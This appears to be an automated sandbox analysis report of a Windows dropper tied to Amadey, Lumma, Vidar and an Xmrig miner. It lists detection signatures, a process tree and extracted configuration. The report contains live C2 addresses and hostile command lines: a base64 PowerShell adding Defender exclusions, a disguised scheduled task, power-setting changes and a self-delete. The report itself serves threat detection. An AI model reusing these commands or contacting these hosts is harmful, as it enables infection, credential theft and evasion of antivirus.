Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1575550
MD5:d2b1682105389a925387227c660abb87
SHA1:9c91cbba1071420b73caad3a2abcfc47360f4f0e
SHA256:65e38a7dd78629bc9a810a0dac0a18f977be82eacd6de5a090c0405c57de7a26
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer, Vidar, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D2B1682105389A925387227C660ABB87)
    • skotes.exe (PID: 7604 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: D2B1682105389A925387227C660ABB87)
  • skotes.exe (PID: 8188 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D2B1682105389A925387227C660ABB87)
    • sUSFJjY.exe (PID: 1260 cmdline: "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" MD5: 3C104350CC2661C345673E91ED672C4C)
      • powershell.exe (PID: 7472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7624 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • RegAsm.exe (PID: 7712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe" MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
        • powercfg.exe (PID: 3568 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4312 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7752 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4588 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • explorer.exe (PID: 5676 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • XpAg0vN.exe (PID: 3332 cmdline: "C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe" MD5: D708CDCF904424E5CCFE7583EE1C7567)
      • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ae91ff4264.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 1712 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3396 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4088 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6296 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6484 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 8020 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6944 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7152 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5000 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 1744 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 2896 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 5272 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 5432 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 2164 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5124 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 5684 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cad620f7d1.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
      • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cad620f7d1.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
    • e42ef86dbf.exe (PID: 1104 cmdline: "C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe" MD5: 7BDD52D200B7195B67E68677DFD53B48)
  • wscript.exe (PID: 4412 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsStopped.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Roaming\IsStopped.exe" MD5: 3C104350CC2661C345673E91ED672C4C)
      • RegAsm.exe (PID: 3872 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe" MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
        • powercfg.exe (PID: 2344 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6008 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": "https://drive-connect.cyou/api", "Build Version": "FATE99--test"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000017.00000003.3848997557.00000000008B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000005.00000003.2321951308.00000000047B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  00000024.00000003.2786193933.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 24 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.file.exe.ec0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      1.2.skotes.exe.700000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                          51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                            51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                            • 0x324cc8:$x1: donate.ssl.xmrig.com
                            Click to see the 4 entries

                            Sigma Signatures

                            Change of critical system settings

                            barindex
                            Sigma detected: Disable power options
                            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, ParentProcessId: 7712, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3568, ProcessName: powercfg.exe

                            System Summary

                            barindex
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84d98ae8ad.exe
                            Sigma detected: Potentially Suspicious Malware Callback Communication
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.157.162.216, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\explorer.exe, Initiated: true, ProcessId: 5676, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49841
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe, ParentProcessId: 1260, ParentProcessName: sUSFJjY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZ
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , ProcessId: 4412, ProcessName: wscript.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84d98ae8ad.exe
                            Sigma detected: Suspicious Add Scheduled Task Parent
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 2896, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 2164, ProcessName: schtasks.exe
                            Sigma detected: Suspicious Execution of Powershell with Base64
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 